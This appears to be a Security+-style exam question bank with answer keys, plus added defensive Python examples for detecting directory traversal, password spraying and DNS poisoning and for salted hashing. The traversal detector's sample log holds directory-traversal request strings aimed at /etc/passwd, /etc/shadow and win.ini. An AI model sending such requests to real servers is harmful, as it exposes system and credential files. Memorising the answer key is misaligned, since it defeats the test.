Answer: B
Explanation:
The question states it is a worldwide company, so you cannot set up a geofencing perimeter. However,
you could have impossible travel time alerts.
QUESTION 200
A network administrator has been asked to design a solution to improve a company's security
posture. The administrator is given the following requirements:
- The solution must be inline in the network
- The solution must be able to block known malicious traffic
- The solution must be able to stop network-based attacks
Which of the following should the network administrator implement to BEST meet these
requirements?
A. HIDS
B. NIDS
C. HIPS
D. NIPS
Answer: D
QUESTION 201
An analyst visits an internet forum looking for information about a tool. The analyst finds a thread
that appears to contain relevant information. One of the posts says the following:
Which of the following BEST describes the attack that was attempted against the forum readers?
A. SQL attack
B. DLL attack
C. XSS attack
D. API attack
Answer: C
Explanation:
Cross-site scripting attacks may occur anywhere that possibly malicious users are allowed to post
unregulated material to a trusted website for the consumption of other valid users. The most
common example can be found in bulletin-board websites which provide web based mailing list-style functionality.
https://owasp.org/www-community/attacks/xss/
https://www.acunetix.com/websitesecurity/cross-site-scripting/
QUESTION 202
Which of the following organizational policies are MOST likely to detect fraud that is being
conducted by existing employees? (Choose two.)
A. Offboarding
B. Mandatory vacation
C. Job rotation
D. Background checks
E. Separation of duties
F. Acceptable use
Answer: BC
QUESTION 203
When selecting a technical solution for identity management, an architect chooses to go from an
in-house to a third-party SaaS provider. Which of the following risk management strategies is this
an example of?
A. Acceptance
B. Mitigation
C. Avoidance
D. Transference
Answer: D
Explanation:
Risk Transference refers to the shifting of the burden of loss for a risk to another party through
legislation, contract, insurance or other means.
https://www.bcmpedia.org/wiki/Risk_Transference
QUESTION 204
A security analyst is looking for a solution to help communicate to the leadership team the
severity levels of the organization's vulnerabilities. Which of the following would BEST meet this
need?
A. CVE
B. SIEM
C. SOAR
D. CVSS
Answer: D
Explanation:
The Common Vulnerability Scoring System (CVSS) is a system widely used in vulnerability
management programs. CVSS indicates the severity of an information security vulnerability, and
is an integral component of many vulnerability scanning tools.
QUESTION 205
A technician needs to prevent data loss in a laboratory. The laboratory is not connected to any
external networks. Which of the following methods would BEST prevent data loss? (Select TWO)
A. VPN
B. Drive encryption
C. Network firewall
D. File-level encryption
E. USB blocker
F. MFA
Answer: BE
QUESTION 206
Which of the following types of controls is a turnstile?
A. Physical
B. Detective
C. Corrective
D. Technical
Answer: A
QUESTION 207
After entering a username and password, an administrator must draw a gesture on a touch
screen. Which of the following demonstrates what the administrator is providing?
A. Multifactor authentication
B. Something you can do
C. Biometric
D. Two-factor authentication
Answer: B
Explanation:
The something you can do authentication factor refers to actions you can take such as gestures
on a touch screen. As an example, Microsoft Windows 10 supports picture passwords. Users first
select a picture, and then they can add three gestures as their picture password. Gestures
include tapping in specific places on the picture, drawing lines between items with a finger, or
drawing a circle around an item such as someone’s head. After registering the picture and their
gestures, users repeat these gestures to log on again later.
QUESTION 208
A security analyst is reviewing the following attack log output:
Which of the following types of attacks does this MOST likely represent?
A. Rainbow table
B. Brute-force
C. Password-spraying
D. Dictionary
Answer: C
Explanation:
Password spraying is a type of brute-force attack in which a malicious actor uses a single
password against targeted user accounts before moving on to attempt a second password, and
so on. This technique allows the actor to remain undetected by avoiding rapid or frequent account
lockouts.
QUESTION 209
Which of the following algorithms has the SMALLEST key size?
A. DES
B. Twofish
C. RSA
D. AES
Answer: A
QUESTION 210
A website developer is working on a new e-commerce website and has asked an information
security expert for the most appropriate way to store credit card numbers to create an easy
reordering process. Which of the following methods would BEST accomplish this goal?
A. Salting the magnetic strip information.
B. Encrypting the credit card information in transit.
C. Hashing the credit card numbers upon entry.
D. Tokenizing the credit cards in the database.
Answer: D
Explanation:
Credit card tokenization is the process of de-identifying sensitive cardholder data by converting it
to a string of randomly generated numbers called a "token." Similar to encryption, tokenization
obfuscates the original data to render it unreadable in the event of a data breach or other
exposure.
QUESTION 211
A financial analyst is expecting an email containing sensitive information from a client. When the
email arrives, the analyst receives an error and is unable to open the encrypted message. Which
of the following is the MOST likely cause of the issue?
A. The S/MIME plug-in is not enabled.
B. The SSL certificate has expired.
C. Secure IMAP was not implemented.
D. POP3S is not supported.
Answer: A
QUESTION 212
A system administrator needs to implement an access control scheme that will allow an object's
access policy to be determined by its owner.
Which of the following access control schemes BEST fits the requirements?
A. Role-based access control
B. Discretionary access control
C. Mandatory access control
D. Attribute-based access control
Answer: B
Explanation:
Discretionary access control (DAC) is a model of access control based on access being
determined "by the owner" of the resource in question. The owner of the resource can decide
who does and does not have access, and exactly what access they are allowed to have.
QUESTION 213
Which of the following are the MOST likely vectors for the unauthorized or unintentional inclusion
of vulnerable code in a software company's final software releases? (Choose two.)
A. Unsecure protocols
B. Use of penetration-testing utilities
C. Weak passwords
D. Included third-party libraries
E. Vendors/supply chain
F. Outdated anti-malware software
Answer: DE
Explanation:
There are plenty of examples of vulnerabilities introduced by insecure third-party libraries.
QUESTION 214
A malicious actor recently penetrated a company's network and moved laterally to the
datacenter. Upon investigation, a forensics firm wants to know what was in the memory on the
compromised server. Which of the following files should be given to the forensics firm?
A. Security
B. Application
C. Dump
D. Syslog
Answer: C
Explanation:
Dump files are a special type of file that stores information about your computer, the software on
it, and the data loaded in memory when something bad happens. They are usually
automatically generated by Windows or by the apps that crash, but you can also manually
generate them.
QUESTION 215
An enterprise has hired an outside security firm to conduct penetration testing on its network and
applications. The firm has only been given the documentation available to the customers of the
applications. Which of the following BEST represents the type of testing that will occur?
A. Bug bounty
B. Black-box
C. Gray-box
D. White-box
Answer: C
Explanation:
In White Box testing internal structure (code) is known.
In Black Box testing internal structure (code) is unknown.
In Grey Box Testing internal structure (code) is partially known.
QUESTION 216
A small business just recovered from a ransomware attack against its file servers by purchasing
the decryption keys from the attackers. The issue was triggered by a phishing email and the IT
administrator wants to ensure it does not happen again. Which of the following should the IT
administrator do FIRST after recovery?
A. Scan the NAS for residual or dormant malware and take new daily backups that are tested on a
frequent basis
B. Restrict administrative privileges and patch all systems and applications.
C. Rebuild all workstations and install new antivirus software
D. Implement application whitelisting and perform user application hardening
Answer: A
Explanation:
The reason the company had to pay the ransom is that it did not have valid backups;
otherwise it would have just restored its data. If your company just had to pay a ransom and
your boss says, "Don't let this happen again", what is the first thing you are going to do? The only
action after a ransomware attack is to "restore from backup".
QUESTION 217
A well-known organization has been experiencing attacks from APTs. The organization is
concerned that custom malware is being created and emailed into the company or installed on
USB sticks that are dropped in parking lots. Which of the following is the BEST defense against
this scenario?
A. Configuring signature-based antivirus to update every 30 minutes.
B. Enforcing S/MIME for email and automatically encrypting USB drives upon insertion.
C. Implementing application execution in a sandbox for unknown software.
D. Fuzzing new files for vulnerabilities if they are not digitally signed.
Answer: C
Explanation:
Encryption is the method by which information is converted into secret code that hides the
information's true meaning. This does nothing for protecting a system. Encrypting bad code will
just look different and mess up your system anyway.
QUESTION 218
A cybersecurity administrator has a reduced team and needs to operate an on-premises network
and security infrastructure efficiently. To help with the situation, the administrator decides to hire a
service provider. Which of the following should the administrator use?
A. SDP
B. AAA
C. IaaS
D. MSSP
E. Microservices
Answer: D
Explanation:
https://www.techtarget.com/searchitchannel/definition/MSSP
QUESTION 219
Which of the following will provide the BEST physical security countermeasures to stop intruders?
(Choose two.)
A. Alarms
B. Signage
C. Lighting
D. Mantraps
E. Fencing
F. Sensors
Answer: DE
Explanation:
Lighting can help provide visibility at night and deter potential intruders, but it may not necessarily
stop an intruder who is determined to enter a facility. Access control vestibules (mantraps) and
fencing are more directly aimed at preventing entry. Alarms and signage can also serve as a deterrent
and provide a way to alert security personnel if an intrusion occurs.
QUESTION 220
A security engineer needs to implement the following requirements:
- All Layer 2 switches should leverage Active Directory for authentication.
- All Layer 2 switches should use local fallback authentication if Active Directory is offline.
- All Layer 2 switches are not the same and are manufactured by several vendors.
Which of the following actions should the engineer take to meet these requirements? (Choose
two.)
A. Implement RADIUS.
B. Configure AAA on the switch with local login as secondary.
C. Configure port security on the switch with the secondary login method.
D. Implement TACACS+.
E. Enable the local firewall on the Active Directory server.
F. Implement a DHCP server.
Answer: AB
QUESTION 221
A software developer needs to perform code-execution testing, black-box testing, and non-functional testing on a new product before its general release. Which of the following BEST
describes the tasks the developer is conducting?
A. Verification
B. Validation
C. Normalization
D. Staging
Answer: B
Explanation:
Verification does not involve code execution while Validation involves code execution. Verification
uses methods like reviews, walkthroughs, inspections and desk-checking whereas Validation
uses methods like black box testing, white box testing and non-functional testing.
QUESTION 222
A vulnerability assessment report will include the CVSS score of the discovered vulnerabilities
because the score allows the organization to better:
A. validate the vulnerability exists in the organization's network through penetration testing.
B. research the appropriate mitigation techniques in a vulnerability database.
C. find the software patches that are required to mitigate a vulnerability.
D. prioritize remediation of vulnerabilities based on the possible impact.
Answer: D
Explanation:
The Common Vulnerability Scoring System (CVSS) is a free and open industry standard for
assessing the severity of computer system security vulnerabilities. CVSS attempts to assign
severity scores to vulnerabilities, allowing responders to prioritize responses and resources
according to threat.
https://en.wikipedia.org/wiki/Common_Vulnerability_Scoring_System
QUESTION 223
During an incident response, a security analyst observes the following log entry on the web
server:
Which of the following BEST describes the type of attack the analyst is experiencing?
A. SQL injection
B. Cross-site scripting
C. Pass-the-hash
D. Directory traversal
Answer: D
Explanation:
The ../../../ sequence in the request is the clue: the attacker is stepping up out of the web root to
reach files elsewhere on the file system, which is directory traversal.
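Worked example (added here; not part of the original question bank): a small detector that flags
directory traversal in web server access logs. The log lines are constructed for the example, since
the dump does not reproduce the entry from the question. The detector percent-decodes the request
target repeatedly, so encoded (%2e%2e%2f) and double-encoded (%252e) variants are caught as well as
the plain ../../../ form, and it walks the path segments rather than string-matching "..", so a file
name such as a..b is not a false positive.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (the log entry the
# question refers to is not reproduced in this dump).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2023:10:01:12 +0000] "GET /images/logo.png HTTP/1.1" 200 5120
203.0.113.5 - - [10/Mar/2023:10:01:15 +0000] "GET /download?file=../../../etc/passwd HTTP/1.1" 200 1842
203.0.113.9 - - [10/Mar/2023:10:02:01 +0000] "GET /download?file=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 403 210
203.0.113.9 - - [10/Mar/2023:10:02:07 +0000] "GET /download?file=%252e%252e%252f%252e%252e%252fwindows%252fwin.ini HTTP/1.1" 200 92
198.51.100.7 - - [10/Mar/2023:10:03:30 +0000] "GET /docs/a..b/report.pdf HTTP/1.1" 200 77000
"""

# Pull the method and request target out of a combined-log-format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(s, max_rounds=3):
    """Percent-decode until the string stops changing, so double-encoded
    sequences such as %252e%252e%252f are reduced to ../ as well."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def escapes_root(path):
    """Walk the path segment by segment (either slash style) and report
    whether a '..' ever climbs above the starting directory."""
    depth = 0
    for segment in re.split(r"[\\/]+", path):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def is_traversal(target):
    """True if the request path or any query-string value escapes the root."""
    decoded = decode_fully(target)
    path, _, query = decoded.partition("?")
    candidates = [path]
    if query:
        candidates.extend(kv.partition("=")[2] for kv in query.split("&"))
    return any(escapes_root(c) for c in candidates)


def find_traversal(log_text):
    """Return (source_ip, request_target) for every log line that looks like
    directory traversal."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and is_traversal(match.group("target")):
            hits.append((line.split()[0], match.group("target")))
    return hits


if __name__ == "__main__":
    for ip, target in find_traversal(SAMPLE_LOG):
        print(ip, target)
```

Run against the sample, the three /download requests are reported and the two benign lines are not.
In production the same check belongs in the application's file-serving code (resolve the path and
confirm it is still under the document root) as well as in detection.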
QUESTION 224
Users have been issued smart cards that provide physical access to a building. The cards also
contain tokens that can be used to access information systems. Users can log in to any thin client
located throughout the building and see the same desktop each time. Which of the following
technologies are being utilized to provide these capabilities? (Choose two.)
A. COPE
B. VDI
C. GPS
D. TOTP
E. RFID
F. BYOD
Answer: BE
Explanation:
The roaming desktop is provided by VDI (virtual desktop infrastructure); the smart card used for
building access is RFID-based.
QUESTION 225
A security analyst discovers several .jpg photos from a cellular phone during a forensics
investigation involving a compromised system. The analyst runs a forensics tool to gather file
metadata. Which of the following would be part of the images if all the metadata is still intact?
A. The GPS location
B. When the file was deleted
C. The total number of print jobs
D. The number of copies made
Answer: A
QUESTION 226
A security analyst is performing a forensic investigation into compromised account credentials.
Using the Event Viewer, the analyst is able to detect the following message:
"Special privileges assigned to new logon."
Several of these messages did not have a valid logon associated with the user before these
privileges were assigned.
Which of the following attacks is MOST likely being detected?
A. Pass-the-hash
B. Buffer overflow
C. Cross-site scripting
D. Session replay
Answer: A
QUESTION 227
A security analyst needs to generate a server certificate to be used for 802.1X and secure RDP
connections. The analyst is unsure what is required to perform the task and solicits help from a
senior colleague.
Which of the following is the FIRST step the senior colleague will most likely tell the analyst to
perform to accomplish this task?
A. Create an OCSP
B. Generate a CSR
C. Create a CRL
D. Generate a .pfx file
Answer: B
Explanation:
A certificate signing request (CSR) is the first step towards obtaining a certificate from a
certificate authority (CA). Generated on the server that will use the certificate, the CSR carries the
subject information (common name, organization, country) the CA will place in the certificate
together with the public key, and the request is signed with the corresponding private key to prove
possession of it. OCSP responders and CRLs handle revocation of certificates that already exist, and a
.pfx file is a way of packaging a certificate and its private key after issuance.
QUESTION 228
An organization hired a consultant to assist with an active attack, and the consultant was able to
identify the compromised accounts and computers.
Which of the following is the consultant MOST likely to recommend to prepare for eradication?
A. Quarantining the compromised accounts and computers, only providing them with network
access
B. Segmenting the compromised accounts and computers into a honeynet so as to not alert the
attackers.
C. Isolating the compromised accounts and computers, cutting off all network and internet access.
D. Logging off and deleting the compromised accounts and computers to eliminate attacker access.
Answer: C
Explanation:
When dealing with an active attack, it is important to isolate the compromised accounts and
computers as quickly as possible. This will help to prevent the attacker from spreading the attack
to other systems on the network.
Isolating the compromised accounts and computers can be done by cutting off all network and
internet access. This will prevent the attacker from being able to communicate with the
compromised systems.
QUESTION 229
Users at an organization have been installing programs from the internet on their workstations
without first obtaining proper authorization. The organization maintains a portal from which users
can install standardized programs. However, some users have administrative access on their
workstations to enable legacy programs to function properly. Which of the following should the
security administrator consider implementing to address this issue?
A. Application code signing
B. Application whitelisting
C. Data loss prevention
D. Web application firewalls
Answer: B
QUESTION 230
A security analyst needs to determine how an attacker was able to use User3 to gain a foothold
within a company's network. The company's lockout policy requires that an account be locked out
for a minimum of 15 minutes after three unsuccessful attempts.
While reviewing the log files, the analyst discovers the following:
Which of the following attacks MOST likely occurred?
A. Dictionary
B. Credential-stuffing
C. Password-spraying
D. Brute-force
Answer: C
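Worked example (added here; the log file in the question is not reproduced in this dump, so the
records below are constructed): telling password spraying from brute force in failed-logon records
under the lockout policy the question states. Brute force shows one account exceeding the threshold
within a lockout window; spraying shows many accounts each tried fewer times than the threshold per
window, which is why an account like User3 never locks out even though the attacker eventually gets
in. The record format, source addresses and user names are assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Lockout policy from the question: three failures inside 15 minutes locks the account.
LOCKOUT_THRESHOLD = 3
LOCKOUT_WINDOW = timedelta(minutes=15)

# Constructed failed-logon records for this example (the real log file in the
# question is not reproduced in the dump). Format: date time outcome user=... src=...
SAMPLE_EVENTS = """\
2023-03-10 08:00:01 LOGON_FAILURE user=User1 src=203.0.113.50
2023-03-10 08:00:02 LOGON_FAILURE user=User2 src=203.0.113.50
2023-03-10 08:00:03 LOGON_FAILURE user=User3 src=203.0.113.50
2023-03-10 08:00:04 LOGON_FAILURE user=User4 src=203.0.113.50
2023-03-10 08:20:01 LOGON_FAILURE user=User1 src=203.0.113.50
2023-03-10 08:20:02 LOGON_FAILURE user=User2 src=203.0.113.50
2023-03-10 08:20:03 LOGON_SUCCESS user=User3 src=203.0.113.50
2023-03-10 08:20:04 LOGON_FAILURE user=User4 src=203.0.113.50
2023-03-10 09:00:00 LOGON_FAILURE user=Admin src=198.51.100.9
2023-03-10 09:00:01 LOGON_FAILURE user=Admin src=198.51.100.9
2023-03-10 09:00:02 LOGON_FAILURE user=Admin src=198.51.100.9
2023-03-10 09:00:03 LOGON_FAILURE user=Admin src=198.51.100.9
2023-03-10 09:30:00 LOGON_FAILURE user=User7 src=192.0.2.14
"""


def parse_events(text):
    """Return (timestamp, outcome, user, source) tuples, one per record."""
    events = []
    for line in text.splitlines():
        date, time, outcome, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields)
        ts = datetime.strptime(date + " " + time, "%Y-%m-%d %H:%M:%S")
        events.append((ts, outcome, kv["user"], kv["src"]))
    return events


def max_failures_in_window(timestamps, window=LOCKOUT_WINDOW):
    """Largest number of failures for one account inside any single window."""
    timestamps = sorted(timestamps)
    best = 0
    for i, start in enumerate(timestamps):
        count = sum(1 for t in timestamps[i:] if t - start < window)
        best = max(best, count)
    return best


def classify_sources(events, min_spray_users=3):
    """Label each source IP as 'brute-force', 'password-spraying' or 'normal'.

    Brute force: one account hammered past the lockout threshold in a window.
    Spraying: many accounts, each tried fewer times than the threshold per
    window, so no account ever locks out."""
    failures = defaultdict(lambda: defaultdict(list))
    for ts, outcome, user, src in events:
        if outcome == "LOGON_FAILURE":
            failures[src][user].append(ts)

    verdicts = {}
    for src, per_user in failures.items():
        peak = max(max_failures_in_window(ts_list) for ts_list in per_user.values())
        if peak >= LOCKOUT_THRESHOLD:
            verdicts[src] = "brute-force"
        elif len(per_user) >= min_spray_users:
            verdicts[src] = "password-spraying"
        else:
            verdicts[src] = "normal"
    return verdicts


if __name__ == "__main__":
    for src, verdict in classify_sources(parse_events(SAMPLE_EVENTS)).items():
        print(src, verdict)
```

The spraying source never exceeds one failure per account per window, so a per-account lockout
rule is blind to it; the per-source view across accounts is what catches it.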
QUESTION 231
Joe, a user at a company, clicked an email link that led to a website that infected his workstation.
Joe was connected to the network, and the virus spread to the network shares. The protective
measures failed to stop this virus, and it continues to evade detection.
Which of the following should the administrator implement to protect the environment from this
malware?
A. Install a definition-based antivirus.
B. Implement an IDS/IPS.
C. Implement a heuristic behavior-detection solution.
D. Implement CASB to protect the network shares.
Answer: C
Explanation:
Heuristic analysis is also one of the few methods capable of combating polymorphic viruses -- the
term for malicious code that constantly changes and adapts. Heuristic analysis is incorporated
into advanced security solutions offered by companies like Kaspersky Labs to detect new threats
before they cause harm, without the need for a specific signature.
https://usa.kaspersky.com/resource-center/definitions/heuristic-analysis
QUESTION 232
A security analyst needs to complete an assessment. The analyst is logged into a server and
must use native tools to map services running on it to the server's listening ports. Which of the
following tools can BEST accomplish this task?
A. Netcat
B. Netstat
C. Nmap
D. Nessus
Answer: B
QUESTION 233
An organization just experienced a major cyberattack. The attack was well coordinated,
sophisticated, and highly skilled. Which of the following targeted the organization?
A. Shadow IT
B. An insider threat
C. A hacktivist
D. An advanced persistent threat
Answer: D
QUESTION 234
A user enters a password to log in to a workstation and is then prompted to enter an
authentication code.
Which of the following MFA factors or attributes are being utilized in the authentication process?
(Choose two.)
A. Something you know
B. Something you have
C. Somewhere you are
D. Someone you are
E. Something you are
F. Something you can do
Answer: AB
QUESTION 235
A security engineer is reviewing log files after a third party discovered usernames and passwords
for the organization's accounts. The engineer sees there was a change in the IP address for a
vendor website one week earlier. This change lasted eight hours. Which of the following attacks
was MOST likely used?
A. Man-in-the-middle
B. Spear-phishing
C. Evil twin
D. DNS poisoning
Answer: D
Explanation:
DNS spoofing, also referred to as DNS cache poisoning, is a form of computer security hacking in
which corrupt Domain Name System data is introduced into the DNS resolver's cache, causing
the name server to return an incorrect result record, e.g. an IP address. This results in traffic
being diverted to the attacker's computer (or any other computer).
https://en.wikipedia.org/wiki/DNS_spoofing
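Worked example (added here; not from the page): the check the engineer in the question is doing,
automated. Given a resolver log for a vendor host name, find the windows during which the resolved
address deviated from the usual answer and how long each lasted. The host name, addresses and
timestamps are constructed for the example; the eight-hour deviation in the sample mirrors the
scenario in the question. Majority vote is used as the baseline only for illustration; in practice
pin the expected answer to a vetted value.

```python
from datetime import datetime

# Constructed resolver-log excerpt for a hypothetical vendor host name; the
# page gives no actual log. Format: ISO timestamp, queried name, answer.
RESOLVER_LOG = """\
2023-03-01T00:00:00 portal.vendor.example 198.51.100.20
2023-03-02T00:00:00 portal.vendor.example 198.51.100.20
2023-03-03T06:00:00 portal.vendor.example 203.0.113.66
2023-03-03T10:00:00 portal.vendor.example 203.0.113.66
2023-03-03T14:00:00 portal.vendor.example 198.51.100.20
2023-03-04T00:00:00 portal.vendor.example 198.51.100.20
2023-03-04T00:00:00 mail.vendor.example 198.51.100.25
"""


def parse_resolutions(text, name):
    """Return the (timestamp, answer) observations for one name, in time order."""
    rows = []
    for line in text.splitlines():
        ts, qname, answer = line.split()
        if qname == name:
            rows.append((datetime.fromisoformat(ts), answer))
    return sorted(rows)


def baseline_answer(rows):
    """Treat the most frequently observed answer as the expected one."""
    counts = {}
    for _, answer in rows:
        counts[answer] = counts.get(answer, 0) + 1
    return max(counts, key=counts.get)


def find_deviations(rows, baseline):
    """Return (rogue_answer, first_seen, restored_at) for every run of
    observations whose answer differs from the baseline. restored_at is the
    first observation after the run that returned the baseline again, or the
    last rogue observation if the run is still open."""
    spans = []
    current = None
    for ts, answer in rows:
        if answer != baseline:
            if current is not None and current[0] != answer:
                spans.append(tuple(current))   # a different rogue answer starts a new run
                current = None
            if current is None:
                current = [answer, ts, ts]
            else:
                current[2] = ts
        elif current is not None:
            current[2] = ts
            spans.append(tuple(current))
            current = None
    if current is not None:
        spans.append(tuple(current))
    return spans


def report(text, name):
    """(rogue_answer, first_seen, restored_at, duration) for each deviation of name."""
    rows = parse_resolutions(text, name)
    base = baseline_answer(rows)
    return [(ans, start, end, end - start) for ans, start, end in find_deviations(rows, base)]


if __name__ == "__main__":
    for ans, start, end, dur in report(RESOLVER_LOG, "portal.vendor.example"):
        print("portal.vendor.example answered %s from %s to %s (%s)" % (ans, start, end, dur))
```

A deviation that coincides with the period in which credentials were entered on the "vendor" site is
the evidence that traffic was diverted; the next step is comparing the rogue address against the
vendor's authoritative records to rule out a legitimate change.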
QUESTION 236
A database administrator needs to ensure all passwords are stored in a secure manner, so the
administrator adds randomly generated data to each password before storing it.
Which of the following techniques BEST explains this action?
A. Predictability
B. Key stretching
C. Salting
D. Hashing
Answer: C
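Worked example (added here; not part of the page): what "adding randomly generated data to each
password before storing it" looks like in code, combined with hashing and key stretching
(PBKDF2-HMAC-SHA256 from Python's standard library), because a salt alone does nothing without a
one-way function behind it. The iteration count and the record layout are choices made for this
example.

```python
import hashlib
import hmac
import os

# Work factor for PBKDF2-HMAC-SHA256; an assumption for this example, tune it
# to your hardware (hundreds of thousands of iterations is typical in 2023).
ITERATIONS = 600_000
SALT_BYTES = 16


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Store a self-describing record: algorithm$iterations$salt_hex$hash_hex.
    A fresh random salt per password means two users with the same password
    get different records, and precomputed (rainbow) tables are useless."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, record):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def same_password_differs(password, iterations=ITERATIONS):
    """Demonstrate the point of salting: identical passwords, different records,
    and both still verify because each record carries its own salt."""
    first = hash_password(password, iterations=iterations)
    second = hash_password(password, iterations=iterations)
    return first != second and verify_password(password, first) and verify_password(password, second)


if __name__ == "__main__":
    record = hash_password("Spring2023!")
    print(record)
    print("verify correct:", verify_password("Spring2023!", record))
    print("verify wrong:  ", verify_password("spring2023!", record))
    print("salted records differ:", same_password_differs("Spring2023!"))
```

The salt is stored in the clear next to the hash; it is not a secret, its job is to make every
stored hash unique so an attacker has to attack each one separately.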
QUESTION 237
A network administrator is setting up wireless access points in all the conference rooms and
wants to authenticate devices using PKI. Which of the following should the administrator
configure?
A. A captive portal
B. PSK
C. 802.1X
D. WPS
Answer: C
QUESTION 238
An organization that is located in a flood zone is MOST likely to document the concerns
associated with the restoration of IT operations in a:
A. business continuity plan.
B. communications plan.
C. disaster recovery plan.
D. continuity of operations plan.
Answer: C
QUESTION 239
A network engineer is troubleshooting wireless network connectivity issues that were reported by
users. The issues are occurring only in the section of the building that is closest to the parking lot.
Users are intermittently experiencing slow speeds when accessing websites and are unable to
connect to network drives. The issues appear to increase when laptop users return to their desks
after using their devices in other areas of the building. There have also been reports of users being
required to enter their credentials on web pages in order to gain access to them. Which of the
following is the MOST likely cause of this issue?
A. An external access point is engaging in an evil-twin attack.
B. The signal on the WAP needs to be increased in that section of the building.
C. The certificates have expired on the devices and need to be reinstalled.
D. The users in that section of the building are on a VLAN that is being blocked by the firewall.
Answer: A
Explanation:
In an evil-twin attack, the attacker stands up a rogue access point that broadcasts the same SSID
and security settings as a legitimate WAP. Clients pick the strongest signal for an SSID they already
trust, so laptops returning to desks near the parking lot, where an attacker in a vehicle can run a
rogue AP without entering the building, roam onto the rogue AP instead of the corporate one. Their
traffic then flows through the attacker's device, which explains the slow, intermittent web access and
the inability to reach internal network drives, and the unexpected credential prompts on web pages
are the attacker's captive portal or interception harvesting credentials. A weak signal, expired
certificates or a blocked VLAN would not produce credential prompts.
QUESTION 240
A global pandemic is forcing a private organization to close some business units and reduce
staffing at others. Which of the following would be BEST to help the organization's executives
determine the next course of action?
A. An incident response plan
B. A communications plan
C. A disaster recovery plan
D. A business continuity plan
Answer: D
Explanation:
Business continuity may be defined as "the capability of an organization to continue the delivery
of products or services at pre-defined acceptable levels following a disruptive incident", and
business continuity planning (or business continuity and resiliency planning) is the process
of creating systems of prevention and recovery to deal with potential threats to a company. In
addition to prevention, the goal is to enable ongoing operations before and during execution of
disaster recovery. Business continuity is the intended outcome of proper execution of both
business continuity planning and disaster recovery.
QUESTION 241
Which of the following scenarios BEST describes a risk reduction technique?
A. A security control objective cannot be met through a technical change, so the company purchases
insurance and is no longer concerned about losses from data breaches.
B. A security control objective cannot be met through a technical change, so the company implements a
policy to train users on a more secure method of operation.
C. A security control objective cannot be met through a technical change, so the company changes its
method of operation.
D. A security control objective cannot be met through a technical change, so the Chief Information Officer
(CIO) decides to sign off on the risk.
Answer: B
Explanation:
Risk reduction techniques are designed to lower the probability or impact of identified risks.
Option B describes a risk reduction technique through the implementation of a policy to train
users on a more secure method of operation, thereby reducing the probability of security
incidents caused by user error.
QUESTION 242
A company was compromised, and a security analyst discovered the attacker was able to get
access to a service account. The following logs were discovered during the investigation:
Which of the following MOST likely would have prevented the attacker from learning the service
account name?
A. Race condition testing
B. Proper error handling
C. Forward web server logs to a SIEM
D. Input sanitization
Answer: B
QUESTION 243
An end user reports a computer has been acting slower than normal for a few weeks. During an
investigation, an analyst determines the system is sending the user's email address and a ten-digit
number to an IP address once a day. The only recent log entry regarding the user's computer is the
following:
Which of the following is the MOST likely cause of the issue?
A. The end user purchased and installed a PUP from a web browser.
B. A bot on the computer is brute forcing passwords against a website.
C. A hacker is attempting to exfiltrate sensitive data.
D. Ransomware is communicating with a command-and-control server.
Answer: A
QUESTION 244
Which of the following scenarios would make a DNS sinkhole effective in thwarting an attack?
A. An attacker is sniffing traffic to port 53, and the server is managed using unencrypted usernames and
passwords.
B. An organization is experiencing excessive traffic on port 53 and suspects an attacker is trying to DoS
the domain name server.
C. Malware trying to resolve an unregistered domain name to determine if it is running in an isolated
sandbox.
D. Routing tables have been compromised, and an attacker is rerouting traffic to malicious websites.
Answer: C
Explanation:
A DNS sinkhole is a resolver that returns a controlled answer (typically a non-routable or internal
address) for known-malicious or otherwise blocked names instead of the real one. Malware that tests
for a sandbox by resolving a name it expects to fail receives the sinkhole's answer, which defeats that
check and, just as usefully, logs which internal hosts asked for the name. Sniffing of port 53 traffic,
a DoS against the resolver and compromised routing tables are not conditions a sinkhole addresses.
QUESTION 245
A security analyst reviews the datacenter access logs for a fingerprint scanner and notices an
abundance of errors that correlate with users' reports of issues accessing the facility.
Which of the following is MOST likely the cause of the access issues?
A. False rejection
B. Cross-over error rate
C. Efficacy rate
D. Attestation
Answer: A
Explanation:
False rejection is the case where a legitimate user is not recognized. It is also referred to as a Type I
error or the false non-match rate (FNMR). The false rejection rate (FRR) is expressed as a percentage
of legitimate attempts that were rejected.
QUESTION 246
A company’s Chief Information Security Officer (CISO) recently warned the security manager that
the company’s Chief Executive Officer (CEO) is planning to publish a controversial opinion article
in a national newspaper, which may result in new cyberattacks.
Which of the following would be BEST for the security manager to use in a threat model?
A. Hacktivists
B. White-hat hackers
C. Script kiddies
D. Insider threats
Answer: A
QUESTION 247
When used at the design stage, which of the following improves the efficiency, accuracy, and
speed of a database?
A. Tokenization
B. Data masking
C. Normalization
D. Obfuscation
Answer: C
QUESTION 248
An analyst needs to set up a method for securely transferring files between systems. One of the
requirements is to authenticate the IP header and the payload. Which of the following services
would BEST meet the criteria?
A. TLS
B. PFS
C. ESP
D. AH
Answer: D
Explanation:
AH (Authentication Header) is the IPsec protocol that provides integrity and origin authentication
for the whole IP packet: its integrity check value covers the payload plus the immutable fields of the
IP header. ESP (Encapsulating Security Payload) authenticates and optionally encrypts the payload,
but its integrity check does not cover the outer IP header. Because the requirement is to
authenticate the IP header as well as the payload, AH meets it; ESP would be the choice if
confidentiality of the payload were the requirement. TLS operates above IP and does not protect the
IP header at all, and PFS is a key-agreement property, not a transfer service.
